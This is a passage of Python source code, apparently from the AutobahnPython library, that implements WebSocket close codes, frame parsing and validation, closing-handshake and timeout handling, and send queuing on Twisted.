CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSockets handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data_total_length += length
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
else:
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
def onMessageFrameData(self, payload):
"""
Callback when receiving data witin message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (sent by peer) (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
We expected the peer to complete the opening handshake with to us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state == WebSocketProtocol.STATE_CONNECTING:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if False or abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSockets connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSockets closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSockets protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSockets closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processHandshake(self):
"""
Process WebSockets handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol.QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows to give a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSockets data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSockets handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame()
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need minimum of 2 octets to for new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
if frame_payload_len < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.current_frame_masker = XorMaskerSimple(frame_mask)
else:
self.current_frame_masker = XorMaskerShifted1(frame_mask)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or and buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
